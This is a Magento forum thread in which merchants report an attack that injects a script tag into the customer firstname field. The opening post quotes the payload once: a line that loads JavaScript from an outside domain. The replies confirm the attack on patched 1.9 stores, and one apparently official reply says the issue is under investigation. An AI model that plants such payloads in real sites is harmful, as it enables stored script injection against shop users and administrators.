- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Hacking Attempts
Had a new one today whereby the attacker uses the firstname field to put a link in to some remote javascript.
When you go to delete the account on a fully patched store you are prevented from doing so by returning invalid form key and the account must be deleted from the Manage Customer Grid.
<script src=//zs.mk/i></script>
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Hacking Attempts
Hi,
Which version of Magento 1 are you using? Do you have all patches applied?
Anna from E-CONOMIX
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Hacking Attempts
Had this same issue. For whatever reason the payment failed and order was not created. Will follow up if it happens. we are fully patched on Magento 1.9 latest version.
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Hacking Attempts
We just had the same exact hack on a customer site. We were fully patched up to the latest version. Does anyone have any information about this hack? There seems to be some vulnerability in Magento.
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Hacking Attempts
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Hacking Attempts
Yes, I've heard a lot about that lately. Can someone tell me more about it? I would like to prevent an attempt to steal my personal information.
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Hacking Attempts
I am really sorry, I don't know why my message posted two times(
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Hacking Attempts
It's always good to be aware of the different ways that hackers can try to gain access to our data. In this case, it sounds like the attacker was trying to inject a malicious script into your store through the first name field. Luckily, you could prevent the attack by deleting the account from the Manage Customer Grid.
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Permalink
- Report Inappropriate Content
Re: Hacking Attempts
We take the security of our platform very seriously. It's concerning to hear about the new hacking attempt utilizing the firstname field to inject remote JavaScript. We appreciate you sharing this information, and our security team is actively investigating and working on implementing measures to address and prevent such attempts. In the meantime, if you encounter difficulties in deleting accounts due to invalid form key issues, please proceed with caution and utilize the Manage Customer Grid for account deletion. Your vigilance and cooperation in reporting security concerns are crucial in maintaining a secure environment for our users, and we encourage you to keep us informed of any further incidents or details related to these hacking attempts